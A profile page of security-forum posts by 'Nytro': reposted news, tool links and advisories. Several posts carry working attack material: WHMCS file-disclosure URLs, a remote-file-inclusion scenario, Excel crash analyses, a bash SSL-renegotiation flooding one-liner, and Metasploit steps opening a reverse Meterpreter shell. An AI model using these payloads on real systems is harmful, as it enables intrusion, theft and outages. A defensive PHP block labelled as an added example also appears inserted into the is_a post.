Everything posted by Nytro
(Posts: 18725, Days Won: 706)
-
Hack in Paris 2011 videos

- Cyberwar-4G aka The Coming Smart Phone Wars
- Locking the Throne Room - ECMA Script 5, a frozen DOM and the eradication of XSS
- Be a smart CISO: learn about people
- "Project Quebec" and win32 exploit development with pvefindaddr
- Offensive XSLT
- Agnitio: the security code review Swiss army knife
- Pentesting iPhone & iPad Applications
- Skirack: ROP for masses
- The forbidden image - Security impact of SVG on the WWW
- A close look at rogue antivirus programs
- Proactive Network Security through Vulnerability Management
- Escaping Windows Sandboxes

Videos: http://www.hackinparis.com/archive-2011

Most of the titles sound very good; I hope they are useful to you.
-
A short administrative announcement: we have two new moderators. Congratulations to:
- wildchild
- Zatarra
PS: We have a few more ideas; it remains to be seen what other changes will follow.
-
We apply the Defcamp method: http://i40.tinypic.com/2464aco.png
-
Pathetic.
-
Network Security Tools

For more than a decade, the Nmap Project has been cataloguing the network security community's favorite tools. In 2011 this site became much more dynamic, offering ratings, reviews, searching, sorting, and a new tool suggestion form. This site allows open source and commercial tools on any platform, except those tools that we maintain (such as the Nmap Security Scanner, Ncat network connector, and Nping packet manipulator). We're very impressed by the collective smarts of the security community and we highly recommend reading the whole list and investigating any tools you are unfamiliar with. Click any tool name for more details on that particular application, including the chance to read (and write) reviews. Many site elements are explained by tool tips if you hover your mouse over them. Enjoy!

http://sectools.org/
-
This post should be regarded as "how not to do it". For the attention of those who have such a mentality and such wishes: if you don't have an account, avoid creating one, and if you already have one, try to keep "quiet".
-
WHMCS (clientarea.php) Local File Disclosure

# Title     : WHMCS (clientarea.php) Local File Disclosure
# Author    : Red Virus >>>c3o@w.cn
# Product   : WHMCS ( WHMCompleteSolution )
# Vendor    : http://whmcs.com/
# Date      : 11/04/2011
# Version   : 3.X.x
# Tested on : linux+apache
# Homepage  : www.alm3refh.com
================================================================
http://localhost/[PATH]/clientarea.php?action=[wrong_value]&templatefile=[LFD]%00
http://localhost/[PATH]/clientarea.php?action=red&templatefile=../../configuration.php%00

show the page source to see Disclosure file
================================================================
Greetz To . >>> alm3refh.com - tryag.cc - joood
T3rr0rist & cyb3r-1st & i-Hmx & h311 c0d3 infofst & virus hima & Karar aLShaMi & all alm3refh group
ahwak2000 & reno & amr2006 & b0x & ZombiE_KsA

Source: WHMCS 3.x Local File Disclosure - Packet Storm
-
Security bug in is_a function in PHP 5.3.7 / 5.3.8

Sep 23 2011

A few weeks ago we migrated a part of our hosting environment from PHP 5.3.6 to PHP 5.3.8. Normally an upgrade like this doesn’t cause any problems, since the PHP minor releases only contain bug- and security fixes. This time however, something big did change. The behaviour of the is_a function was radically altered, causing quite a few errors for clients using certain PHP/PEAR Frameworks. We quickly reverted it, investigated the issue and discovered both the source, and alarmingly, it turned out that a big security hole was introduced.

What was fixed?

PHP 5.3.7 included a fix for PHP bug #53727. This fix however changed the behavior of the is_a() function, a function normally used to check if a certain variable is a child of a specific Class. The original behavior accepted all sorts of inputs as its primary argument, including strings. The old behavior was to see if this “string” was an instance of a specific Class, which it obviously wasn’t, and return false. The new behavior however, attempts to be “helpful”, and passes its first argument to the __autoload() function. And it is this exact change that caused such unexpected behavior for our customers.

The problem our customers were having is that they had some (custom) code that implemented a very basic autoloader, in an attempt to reduce memory footprints by automatically loading class definitions when they were needed using the __autoload() function. Their code however never expected to be given anything other than a class name, but now all of a sudden they were receiving all sorts of objects. Take for example the following code snippet using a standard pear File library:

    //autoload function from http://www.php.net/manual/en/language.oop5.autoload.php
    function __autoload($class_name) {
        include $class_name . '.php';
    }

    $uploaded_file = File::readAll($uploaded_filename);
    if (PEAR::isError($uploaded_file)) {
        print_error($uploaded_file);
    } else {
        process_upload($uploaded_file);
    }

Normally one wouldn’t expect the __autoload() function to be called at all here, but the PEAR::File library uses the PEAR standards and uses the PEAR::isError() call internally to check if the file was read correctly or if an error was returned. This function ends up calling the is_a function, and this ends up calling the autoloader function, which is obviously poorly equipped to handle anything but explicit classnames. As a result, even this standard piece of PHP code, using standard libraries and code snippets from the php.net site itself, suddenly has its behavior changed. Instead of simply sending the uploaded file to the process_upload() function, the __autoload() function now tries to include a file that doesn’t exist and throws a giant error to the client.

The problem with the new behavior

Normally a BC breaking bug isn’t a huge deal. Sure, some people have some unexpected behavior, which is why the developers try and avoid breaking BC in a minor update. If any does happen, people file a bug and the behavior is fixed in the next update. The same happened to this bug: PHP bug #55475 was filed and a discussion was started about whether this bug should be fixed or if the change was intended behavior.

The biggest problem with this new behavior however, is not just the fact that errors are suddenly displayed. Of course this was a problem for the webmasters hosting at our servers, but the real problem lies even deeper than that… A lot of __autoload() implementations we found on our systems use the standard example from php.net to include their classes, which doesn’t contain any sort of checks before trying to include a file. While one could argue that it’s never a good idea to simply copy example code into a live environment, this does happen more often than not, according to our scans.

And it is exactly in this standard behavior that the problem lies. If we look again at the example above, it’s easy to see what happens. A file, say a JPG file, is uploaded by the user and read from the disk. The script checks to see if it read the file correctly and in doing so passes the contents of the uploaded file to the __autoload() function, that tries to load the class. Now normally the server would print an error stating “include(/var/www/domain.com/upload/.php) [function.include]: failed to open stream: No such file or directory (error #2)”, and present this to the user.

Now what if the user doesn’t upload an image file, but a carefully crafted text file with a JPEG extension. Imagine for example the following contents in the file:

    http://www.cracker.com/hack-me-include

Now we take that file and upload it to the website. The file is read by File::readAll(), its contents returned in $uploaded_file. We pass this variable to the PEAR::isError() function, it passes it to the __autoload() function, which blindly prepares the string to include:

    "http://www.cracker.com/hack-me-include" . ".php" => "http://www.cracker.com/hack-me-include.php"

A nice and complete URL. It feeds this to the include() function, which downloads the file with code from the remote website and, eventually, executes it. At this point, you can consider your website lost, as the hacker can execute whatever code he wants on your website. He has full access to your database configuration file, your settings, your database with customer information, and everything else. The only recourse you have at this point is to restore your entire website from a known and trusted backup, and change all your passwords (both for your hosting environment, your website, and for all your customers whose information has been exposed to the hackers).

The fix

Luckily there’s quite a few ways to fix it.

- Disable the setting allow_url_include in your php.ini to prevent remote file inclusion
- Patch your __autoload() to only include from a local dir:

    include("./includes/" . $class_name . ".php");

- Install Suhosin to protect yourself from remote file inclusion, and more.

Of course, the best fix for this is to not install PHP 5.3.7 or PHP 5.3.8 until the PHP Project has fixed this bug and reverted to the old behavior.

The impact

The impact of this bug is relatively small. It takes quite some specific code to get your input passed all the way to the is_a/autoloader, but as the example showed it’s possible to do. I personally don’t expect to see any exploits abusing this bug, but when it comes to the security of your website, better safe than sorry.

Also, for customers hosted at Byte, good news. Of course we have the allow_url_include setting turned off by default.

Source: http://www.byte.nl/blog/2011/09/23/security-bug-in-is_a-function-in-php-5-3-7-5-3-8/
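The fixes listed in the post all work around the same root cause: the autoloader turns whatever string it receives into an include path. As an added example that is not part of the original post or the Byte blog, the following autoloader validates the class name before any path is built, so uploaded file contents, URLs or traversal strings reaching it through is_a()/PEAR::isError() are rejected without touching the filesystem. The temporary class directory and the Greeter class are constructed for the demo; the code targets PHP 7.1 or later.

```php
<?php
declare(strict_types=1);

// Added example, not code from the Byte blog post. A defensive autoloader:
// anything that is not a plausible PHP class name is rejected before include()
// is ever considered, so a string that reaches the autoloader through
// is_a()/PEAR::isError() (file contents, a URL, a path) cannot become an
// include path. The class directory and the 'Greeter' class are constructed
// fixtures for this demo.

/**
 * Map a class name to a file inside $classDir, or return null when the name is
 * not an acceptable identifier or the file resolves outside $classDir.
 */
function resolveClassFile(string $className, string $classDir): ?string
{
    // Only PHP identifier characters and namespace separators are accepted.
    // '/', '.', ':', whitespace, NUL and the like fail here, with no filesystem access.
    $identifier = '/^\\\\?[A-Za-z_][A-Za-z0-9_]*(\\\\[A-Za-z_][A-Za-z0-9_]*)*$/';
    if (preg_match($identifier, $className) !== 1) {
        return null;
    }
    $base = realpath($classDir);
    if ($base === false) {
        return null;
    }
    $relative = str_replace('\\', '/', ltrim($className, '\\')) . '.php';
    $path = realpath($base . '/' . $relative);
    // The canonicalised path must stay under the class directory (guards against symlinks).
    if ($path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Constructed fixture: a throwaway class directory holding one real class file.
$classDir = sys_get_temp_dir() . '/autoload-demo-' . getmypid();
mkdir($classDir, 0700, true);
file_put_contents(
    $classDir . '/Greeter.php',
    "<?php\nclass Greeter { public function hi(): string { return 'hi'; } }\n"
);

// spl_autoload_register() is the modern replacement for defining __autoload().
spl_autoload_register(function (string $className) use ($classDir): void {
    $file = resolveClassFile($className, $classDir);
    if ($file !== null) {
        require $file;
    }
});

// Inputs: a real class name, then the kinds of values the post describes
// reaching the autoloader (uploaded file contents, a traversal path with NUL).
$inputs = [
    'Greeter',
    'http://www.cracker.com/hack-me-include',
    "../../configuration\0",
];
foreach ($inputs as $input) {
    $resolved = resolveClassFile($input, $classDir);
    printf("%-45s => %s\n", var_export($input, true), $resolved ?? 'REJECTED');
}

// The legitimate class loads through the registered autoloader ...
echo (new Greeter())->hi(), "\n";
// ... while is_a() on an arbitrary string does not autoload it: since PHP 5.3.9
// a string first argument is only treated as a class name when the optional
// third argument ($allow_string) is true.
var_dump(is_a('http://www.cracker.com/hack-me-include', 'PEAR_Error'));

// Remove the fixture.
unlink($classDir . '/Greeter.php');
rmdir($classDir);
```

Run it with `php autoload-demo.php`: the first input resolves to the fixture file, the URL and the traversal string print REJECTED, the Greeter instance prints "hi", and the is_a() call dumps bool(false). The identifier check does the real work; the realpath() prefix check is a second layer for the case where a valid-looking name still points outside the class directory.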
-
Microsoft Excel Use after free/Memory corruption

#######################################################################

Luigi Auriemma

Application:  Microsoft Excel
              http://office.microsoft.com/en-us/excel/
              http://office.microsoft.com/en-us/downloads/CD001022531.aspx
Versions:     tested Office 2003 11.8335.8333 SP3
Platforms:    Windows
Bug:          use after free
Exploitation: file
Date:         03 Nov 2011 (found 24 Aug 2011)
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

Excel 2003 is a spreadsheet program, part of the Office 2003 suite still supported by Microsoft.

#######################################################################

======
2) Bug
======

Use-after-free probably located in the code that handles the vbscript macros:

eax=00492d78 ebx=00000000 ecx=feeefeee edx=00185ff8 esi=004c72b8 edi=00492478
eip=65058591 esp=00185fd0 ebp=0018601c iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210206
VBE6!DllVbeInit+0x40f6f:
65058591 ff11            call    dword ptr [ecx]      ds:002b:feeefeee=????????
0:000:x86> k
ChildEBP RetAddr
0018601c 6501c0dd VBE6!DllVbeInit+0x40f6f
00186074 6505dee2 VBE6!DllVbeInit+0x4abb
001860a8 6505e21c VBE6!DllVbeInit+0x468c0
00186220 767cbc9c VBE6!DllVbeInit+0x46bfa
00000000 00000000 ole32!StgIsStorageFile+0x764

How to replicate:
- open the proof-of-concept via web or manually
- "An error occurred while loading 'Module1'. Do you want to continue loading the project?": select No; if you select Yes then the bug doesn't seem to be replicable
- "Unexpected error (32790)": select OK
- "Excel found unreadable content in ...": Yes or No is the same
- now reopen the proof-of-concept and the bug will happen immediately

The reopening of the same file seems necessary, probably because the Office suite uses only one instance of its programs and performs a particular reallocation of the resources when a file gets reopened.

Note that I have tested only the latest version of Office 2003 on Windows 7.

The proof-of-concept is NOT optimized.

Modified bytes:
excel_1a.xls: 0006FCA4 AA 01
excel_1b.xls: 0006FCB0 AD 40

#######################################################################

===========
3) The Code
===========

http://aluigi.org/poc/excel_1.zip

#######################################################################

======
4) Fix
======

No fix.

#######################################################################


#######################################################################

Luigi Auriemma

Application:  Microsoft Excel
              http://office.microsoft.com/en-us/excel/
              http://office.microsoft.com/en-us/downloads/CD001022531.aspx
Versions:     tested Office 2003 11.8335.8333 SP3
Platforms:    Windows
Bug:          memory corruption
Exploitation: file
Date:         03 Nov 2011 (found 24 Aug 2011)
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

Excel 2003 is a spreadsheet program, part of the Office 2003 suite still supported by Microsoft.

#######################################################################

======
2) Bug
======

Memory corruption:

eax=00000000 ebx=00690066 ecx=00000de9 edx=00000de8 esi=000202ad edi=00630020
eip=30039ea2 esp=001896a8 ebp=02000814 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210206
Excel!Ordinal41+0x39ea2:
30039ea2 c7450800010000  mov     dword ptr [ebp+8],100h ss:002b:0200081c=00690066
0:000:x86> k
ChildEBP RetAddr
001896b0 30278c45 Excel!Ordinal41+0x39ea2
001896c8 30278c45 Excel!Ordinal41+0x278c45
001896e0 3070c95a Excel!Ordinal41+0x278c45
00189708 301fd1cb Excel!MdCallBack+0x27fe3e
001899f8 010300dd Excel!Ordinal41+0x1fd1cb
001899fc 00000000 0x10300dd

Note that the exception can change and NO additional research has been performed.

How to replicate:
- open the proof-of-concept via web or manually
- excel_2b.xls requires the clicking of "Open" when requested
- now reopen the proof-of-concept and the bug will happen immediately

The reopening of the same file seems necessary, probably because the Office suite uses only one instance of its programs and performs a particular reallocation of the resources when a file gets reopened.

Note that I have tested only the latest version of Office 2003 on Windows 7.

The proof-of-concept is NOT optimized.

Modified bytes:
excel_2a.xls: 00067B5F 06 00
excel_2b.xls: 00067B63 00 7F
excel_2c.xls: 00000D70 00 04

#######################################################################

===========
3) The Code
===========

http://aluigi.org/poc/excel_2.zip

#######################################################################

======
4) Fix
======

No fix.

#######################################################################

Sources:
- http://aluigi.altervista.org/adv/excel_1-adv.txt
- http://aluigi.altervista.org/adv/excel_2-adv.txt
-
Text-based CAPTCHA Strengths and Weaknesses

Elie Bursztein, Stanford University, elie at cs.stanford.edu
Matthieu Martin, Stanford University, mamartin at stanford.edu
John C. Mitchell, jcm at cs.stanford.edu

The slides and paper are available for free from Text-based CAPTCHA Strengths and Weaknesses - Elie Bursztein
Follow Elie on Twitter: https://twitter.com/elie and Google+: http://ly.tl/g

ABSTRACT

We carry out a systematic study of existing visual CAPTCHAs based on distorted characters that are augmented with anti-segmentation techniques. Applying a systematic evaluation methodology to 15 current CAPTCHA schemes from popular web sites, we find that 13 are vulnerable to automated attacks. Based on this evaluation, we identify a series of recommendations for CAPTCHA designers and attackers, and possible future directions for producing more reliable human/computer distinguishers.

Download: http://cdn.ly.tl/publications/text-based-captcha-strengths-and-weaknesses.pdf
-
Duqu Analysis & Detection Tool Released

NSS engineers have developed a scanning tool that can be used to detect all DuQu drivers installed on a system. This tool was developed in the hopes that additional drivers can be discovered to allow us to learn more about the functionality, capabilities and ultimate purpose of DuQu. Based on the layout of the drivers discovered so far, the NSS tool is capable of detecting 100% of drivers with zero false positives. Because it is using advanced pattern recognition techniques, it is also capable of detecting new drivers as they are discovered. Two new drivers were discovered after the tool was completed, and both were detected by the NSS tool with no updates required.

Download: https://github.com/halsten/Duqu-detectors

Via: Duqu Analysis & Detection Tool
Source: Security-Shell: Duqu Analysis & Detection Tool Released
-
Paul4Games can only come if he brings some of that shawarma from his place. :->
-
Who is going to sponsor me with some drinks?
-
THC-SSL-DOS

It's not as elegant as the private thc-ssl-dos but works quite well indeed. 2 simple commands in bash:

-----BASH SCRIPT BEGIN-----
thc-ssl-dosit() { while :; do (while :; do echo R; done) | openssl s_client -connect 127.0.0.1:443 2>/dev/null; done }
for x in `seq 1 100`; do thc-ssl-dosit & done
-----BASH SCRIPT END-------

 ______________ ___    _________
 \__    ___/   |   \  \_   ___ \
   |    | /    ~    \ /    \  \/
   |    | \    Y    /\     \____
   |____|  \___|_  / \______  /
                 \/          \/
 http://www.thc.org

THC-SSL-DOS is a tool to verify the performance of SSL.

Establishing a secure SSL connection requires 15x more processing power on the server than on the client.

THC-SSL-DOS exploits this asymmetric property by overloading the server and knocking it off the Internet.

This problem affects all SSL implementations today. The vendors are aware of this problem since 2003 and the topic has been widely discussed.

This attack further exploits the SSL secure Renegotiation feature to trigger thousands of renegotiations via single TCP connection.

Download:
Windows binary: thc-ssl-dos-1.4-win-bin.zip
Unix Source   : thc-ssl-dos-1.4.tar.gz

Use "./configure; make all install" to build.

Usage:
./thc-ssl-dos 127.3.133.7 443
Handshakes 0 [0.00 h/s], 0 Conn, 0 Err
Secure Renegotiation support: yes
Handshakes 0 [0.00 h/s], 97 Conn, 0 Err
Handshakes 68 [67.39 h/s], 97 Conn, 0 Err
Handshakes 148 [79.91 h/s], 97 Conn, 0 Err
Handshakes 228 [80.32 h/s], 100 Conn, 0 Err
Handshakes 308 [80.62 h/s], 100 Conn, 0 Err
Handshakes 390 [81.10 h/s], 100 Conn, 0 Err
Handshakes 470 [80.24 h/s], 100 Conn, 0 Err

Comparing flood DDoS vs. SSL-Exhaustion attack:

A traditional flood DDoS attack cannot be mounted from a single DSL connection. This is because the bandwidth of a server is far superior to the bandwidth of a DSL connection: A DSL connection is not an equal opponent to challenge the bandwidth of a server.

This is turned upside down for THC-SSL-DOS: The processing capacity for SSL handshakes is far superior at the client side: A laptop on a DSL connection can challenge a server on a 30Gbit link.

Traditional DDoS attacks based on flooding are sub optimal: Servers are prepared to handle large amount of traffic and clients are constantly sending requests to the server even when not under attack.

The SSL-handshake is only done at the beginning of a secure session and only if security is required. Servers are _not_ prepared to handle large amount of SSL Handshakes.

The worst attack scenario is an SSL-Exhaustion attack mounted from thousands of clients (SSL-DDoS).

Tips & Tricks for whitehats
1. The average server can do 300 handshakes per second. This would require 10-25% of your laptop's CPU.
2. Use multiple hosts (SSL-DOS) if an SSL Accelerator is used.
3. Be smart in target acquisition: The HTTPS Port (443) is not always the best choice. Other SSL enabled ports are more unlikely to use an SSL Accelerator (like the POP3S, SMTPS, ... or the secure database port).

Counter measurements:
No real solutions exists. The following steps can mitigate (but not solve) the problem:
1. Disable SSL-Renegotiation
2. Invest into SSL Accelerator

Either of these countermeasures can be circumvented by modifying THC-SSL-DOS. A better solution is desirable. Somebody should fix this.

Yours sincerely,
The Hackers Choice

#!/bin/the hacker's choice - THC

Source: http://www.thc.org/thc-ssl-dos/
-
'Poison Ivy' Kit Enables Easy Malware Customization for Attackers

By Brian Prince on November 03, 2011

It is no secret malware kits have been the source of many of the infections plaguing users in recent years. This trend is epitomized by Poison Ivy, a remote administration tool (RAT) at the heart of the Nitro attacks targeting the chemical and defense industries.

In a new research paper, Microsoft chronicled how Poison Ivy works and why it continues to be utilized by attackers. For one thing, the tool is available for free.

“Poison Ivy has an official website from which the kit is distributed. It is also available on a variety of underground websites and forums,” according to the Microsoft report. “This free and open distribution is growing increasingly uncommon as the malware authors of today tend to operate exclusively within their trusted circles and sell their creations to the highest bidders.”

According to Microsoft, Poison Ivy uses a client/server architecture to essentially turn victim machines into “servers” that operators can then connect to and remotely control.

“The malware is considered a kit because operators can configure the server application to their liking before generating a server assembly that is then distributed and covertly installed on victim systems,” the Microsoft researchers wrote in the paper. “These server assemblies are very small (generally between 7 KB and 10 KB). The kit also contains a “client” component that a controller can use to remotely access and control compromised systems.”

Once on an infected system, the malware enables an attacker to download and upload files remotely, log keystrokes, inject malicious code and perform other malicious activities. The malware is distributed in a variety of ways, from software vulnerabilities to phishing e-mails, with the latter being how Poison Ivy infiltrated RSA earlier this year.

Poison Ivy was also linked to the GhostNet spy operation uncovered in 2009, as well as the Nitro attacks recently publicized by Symantec.

“With Poison Ivy there's the option to pay the author for customized versions,” Roel Schouwenberg, senior researcher at Kaspersky Lab, told SecurityWeek. “However, we believe that in these APT-style attacks the attackers customize Poison Ivy themselves.”

Officials at Microsoft said the company has removed Poison Ivy from some 16,000 infected machines as of last month. In the report, researchers note the United States has been the hardest hit in 2011, accounting for 12 percent of infections. Second and third on the list are Korea and Spain, which registered nine and seven percent, respectively.

The Microsoft paper can be downloaded here: http://www.microsoft.com/download/en/details.aspx?displaylang=en&id=27871

Source: https://www.securityweek.com/poison-ivy-kit-enables-easy-malware-customization-attackers

The problem is this: did these guys only realize after 3 years that such "kits" exist?
-
REC - Reverse Engineering Compiler

Features

As mentioned, Rec Studio 4 is still under development. Most target independent features have been completed, such as:

- Multihost: Rec Studio runs on Windows XP/Vista/7, Ubuntu Linux, Mac OS X.
- Symbolic information support using Dwarf 2 and partial recognition of Microsoft's PDB format.
- C++ is partially recognized: mangled names generated by gcc are demangled, as well as inheritance described in dwarf2 is honored. However, C++ is a very broad and difficult language, so some features like templates won't likely be ever supported.
- Types and function prototype definitions can be specified in text files. Some standard Posix and Windows APIs are already provided in the Rec Studio package.
- Interactivity is supported, limited to definition of sections, labels and function entry points. Will need to improve it to support in-program definition of types and function parameters.

Although REC can read Win32 executable (aka PE) files produced by Visual C++ or Visual Basic 5, there are limitations on the output produced. REC will try to use whatever information is present in the .EXE symbol table. If the .EXE file was compiled without debugging information, if a program data base file (.PDB) or Codeview (C7) format was used, or if the optimization option of the compiler was enabled, the output produced will not be very good. Moreover, Visual Basic 5 executable files are a mix of Subroutine code and Form data. It is almost impossible for REC to determine which is which. The only option is to use a .cmd file and manually specify which area is code and which area is data. In practice, only C executable files produce meaningful decompiled output.

Download: http://www.backerstreet.com/rec/recdload.htm
-
Exploiting “Free Public WiFi”

Posted by Skyler on November 2, 2011 – 12:05 pm

A few weeks ago Joshua Wright did a SANS webcast on Exploiting Modern Wireless Networks. For a long time WiFi attacks have focused on either cracking WEP, or brute forcing a WPA shared key. Josh goes over some of the new attack vectors against wireless and how you can use them in a penetration test.

My favorite slide had to do with that obscure “Free Public WiFi” SSID that we see all over the place. I see these all the time at airports, but also at hotels and other commonly utilized public wifi areas. Apparently this is the default name for ad-hoc networks that are created by Windows XP SP2. Obviously this gets us excited (MS08-067). If they are running an XP SP2 box, we can probably assume that the machine is not frequently administered, and most likely not patched.

Here are the simple steps that Josh Wright provided in order to exploit this machine:

Connect to the adhoc network

    # iwconfig wlan1 essid "Free Public WiFi" mode adhoc

Use tcpdump to find the IP (bolded IP below) of the XP box hosting the ad hoc network. Note: the hosting box will be broadcasting NetBIOS packets to help configure associated clients.

    # tcpdump -ni wlan1 -s0 -nt
    IP 169.254.131.118.138 > 169.254.255.255.138: NBT UDP PACKET(138)

Configure your IP (for the reverse shell to shovel back to)

    # ifconfig wlan1 169.254.1.1 netmask 255.255.0.0

Own It

    # msfconsole
    # use exploit/windows/smb/ms08_067_netapi
    # set PAYLOAD windows/meterpreter/reverse_tcp
    # set LPORT 9999
    # set RHOST 169.254.131.118
    # set LHOST 169.254.1.1
    # exploit

Pretty straight forward, huh? As always, thanks to the SANS teams for their awesome contributions to the security industry. Make sure to check out the new SANS Pen Testing blog! It's fantastic!

Source: http://securityreliks.securegossip.com/2011/11/exploiting-free-public-wifi/
-
As Hacking Increases, Being Anonymous Getting Harder Anonymous isn’t so anonymous anymore. Companies like Sony will continue to witness more breaches of their virtual networks until top level executives start taking hackers, and the cyber gangs that run many of them, as seriously as they take their client base. Not only do Sony PlayStation gamers want their IDs and internet protocol addresses kept secret, companies like Sony want their computer systems, housing thousands of sacred corporate data, protected just the same. In the tug of war between software security and cyber criminals, the red ribbon on the rope is still squarely in the middle, which means this is one battle the security guys have not fully won. In fact, it is doubtful that they ever will. For every malware companies like Kaspersky Lab have destroyed, two more have popped up in its place. Tim Armstrong, a virus researcher at the Massachusetts based headquarters of Russian IT security firm Kaspersky Lab said on the company’s website Wednesday that corporations were not doing enough to protect their data, and the personal information of their clients. “Companies have a lack of high level education that these threats are important to deal with,” he said. “Until they do, more security breaches will happen.” Sony has become the poster child of bad corporate IT. The company’s online gaming division was hacked again last month. Hacking has become somewhat glamorous. But hackers operate in different worlds. There’s thee advanced persistent threat, or APT, which is usually the mastermind of governments. There’s various cyber criminals and gangs from China to Russia who are after bank accounts and harvesting personal identities. Then there’s the new hacktivism group, like Anonymous, and even LulzSec who once said that hackers should target Sony’s PlayStation site in order to get Americans off the couch. 
Many companies might not understand internet security, but the backside of a security breach is often more costly than it is to set up a security wall around a product, or network; a network that a growing number of corporate customers are linked into through QR codes and, of course, the now famous “cloud” of virtual networks that are making personal hard drives obsolete. On Oct. 21, I spoke with Kaspersky Lab analyst Sergey Golovanov about the latest security threats from the APTs to botnets, and whether or not the top three software security firms had it under control. Rapoza: Your CEO Eugene Kaspersky says computer networks are increasingly under attack. Is it getting worse? Golovanov: I think we all have the malicious security issues under control at present. But if individuals and companies do not see just how big of a problem these code writers are becoming, and if they let their guard down, then the malware writers will definitely win. All the world is connected by computers. Your electric power is run by computer networks. Stuxnet, a worm IT security analysts found last year, shut down all of Iran’s electricity. If we are talking about a common user, whether a company or a personal computer or smart phone, malware writers can do anything they want with the data they mine from a network. They will still your data. They will steal your money. They will steal your identity. It is becoming a bigger problem. Experts at Kaspersky Lab are continuing an ongoing investigation into what has become the biggest malware program to date, known as Duqu. Golovanov said last month that Duqu shares some characteristics with the infamous Stuxnet worm that targeted industrial installations in Iran. Though the ultimate objective of the creators of this new cyber threat is still unknown nearly two months later, what is clear is that Duqu is being used for carrying out targeted attacks on a limited number of objects, included those in Iran. 
Commenting on the new findings, Alexander Gostev, Chief Security Expert at Kaspersky Lab, was quoted saying on the company’s website: “Despite the fact that the location of the systems attacked by Duqu are located in Iran, to date there is no evidence of their being industrial or nuclear program-related systems (like Stuxnet). As such, it is impossible to confirm that the target of the new malicious program is the same as that of Stuxnet. Nevertheless, it is clear that every infection by Duqu is unique. This information allows one to say with certainty that Duqu is being used for targeted attacks on pre-determined objects.” Duqu is most likely an APT. That type of program isn’t going to hack into a person’s X Box Live account, or their Android. In fact, the malware gunning for Microsoft and Google networks are numerous and potentially just as damaging. Not only does a company, like Sony, start to lose credibility in its fight against cybercrime, but smartphones running Android are more susceptible to attacks than iPhones. Bad for Google. Great for Apple. All told, on computer devices running Kaspersky Lab security software alone, 213,602,142 network attacks were blocked. Over 263 million malware programs were detected and neutralized. By comparison, in August 193.9 million network attacks were blocked and 258 million malware programs were detected and eliminated. That’s just on machine’s running Kaspersky Lab IT software, so the number is actually much bigger when considering devices using Symantec’s Norton brand security products and McAfee. KR: What’s making Android more attractive to hackers than iPhone? SG: We haven’t found any iPhone malware yet. Everyone is looking for the Android users and that’s probably because the iPhone is a closed operating system and the Android is an open operating system so it is easier to create malicious software for them. 
KR: The new quick response (QR) codes, those crazy scannable boxes you see with scrambled crossword puzzle-like squares inside on everything from the local newspaper to a box of cereal now; they seem to be the new favorite of hackers. How do they work and how do you stop them?

SG: You can use security software applications to stop them, for the most part. The first known instance of QR code malware we found in Russia in September. Russians thought they were downloading a new Android app called Jimm, but instead when they swiped their phone over that bar code it ended up sending numerous text messages to a long distance number that they had to pay for. We’ve found a few of them in Russia and know who is spreading them and who is making them.

KR: Who is it?

SG: It’s a hacker network in Russia. Mostly Russian. The Russians are like the project managers of the group and the QR codes are just spread out through malware writers within that network through blogs or on news websites that were hacked. The code brings users to a fake application. It’s all about exploiting people, and once you’re infected, the hackers have your phone number and can access info on your smartphone.

KR: What’s a recent malware program you guys helped neutralize?

SG: The Hlux botnet. We did that with Microsoft mostly. We were tracking it since early in the year. It was mostly stealing personal data, phishing, spamming and sending out denial of service attacks on computers. We have full control over it now and are working with U.S. law enforcement on the case. The roots of the operation are in the U.S., but we are pretty sure their base of operations is in Russia.

KR: How do you stay on top of hacker groups?

SG: We infiltrate their online chat forums, especially through the invisible web or by using Tor, an anonymous network where hackers like LulzSec and Anonymous often hang out.

KR: A black market internet. Deep cover cyberspace. That’s as anonymous as you get, I guess.

SG: Yes. We’re in there.
We have to weed through a lot of nonsense, but you can get a sense of what those groups are doing in that hidden internet. They’re usually up to no good.

Source: http://www.forbes.com/sites/kenrapoza/2011/11/03/as-hacking-increases-being-anonymous-getting-harder/
-
Microsoft Excel 2007 SP2 Buffer Overwrite Exploit
Abysssec Research

1) Advisory information
Title : Microsoft Excel 2007 SP2 Buffer Overwrite Vulnerability
Analysis : Abysssec.com
Vendor : Microsoft Corporation
Impact : Critical
Contact : info [at] abysssec.com
Twitter : @abysssec

Microsoft : A remote code execution vulnerability exists in the way that Microsoft Excel handles specially crafted Excel files. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

Each Excel file can contain multiple BOF (2057) records. This record specifies the first substream associated with the workbook. One of the fields in these records specifies which substream record comes with it. This field can be extracted from the sub_3018F0C2 function.

.text:301A0C87 push [ebp+arg_2C]
.text:301A0C8A mov ecx, [ebp+var_14]
.text:301A0C8D push 1
.text:301A0C8F call sub_3018F0C2
.text:301A0C94 mov ecx, eax
.text:301A0C96 mov eax, [ebp+arg_24]
.text:301A0C99 cmp eax, ebx
.text:301A0C9B mov [ebp+var_10], ecx
.text:301A0C9E jz short loc_301A0CA2
.text:301A0CA0 mov [eax], ecx

If the field value is equal to 400, the sub_3019DFBA function is called to check the file type. If the file type is xls, EXCEL.exe will display a message; if approved it will continue to run the code. If you change the file extension to xlb there will not be any message. After this step the sub_3053F626 function will be executed. This function will parse the next BOF records.
.text:304D4E9D cmp [ebp+arg_20], ebx
.text:304D4EA0 jnz short loc_304D4EC6
.text:304D4EA2 test dword ptr word_30EDCF9C, 2000000h
.text:304D4EAC jnz short loc_304D4EC6
.text:304D4EAE mov edx, [ebp+arg_C]
.text:304D4EB1 mov ecx, [ebp+arg_8]
.text:304D4EB4 push 3Fh
.text:304D4EB6 call sub_3019DFBA
.text:304D4EBB cmp eax, ebx
.text:304D4EBD mov [ebp+var_8], eax
.text:304D4EC0 jz loc_304D4FD3
.text:304D4EC6
.text:304D4EC6 loc_304D4EC6: ; CODE XREF: sub_301A0BC7+3342D9j
.text:304D4EC6 ; sub_301A0BC7+3342E5j
.text:304D4EC6 push ebx
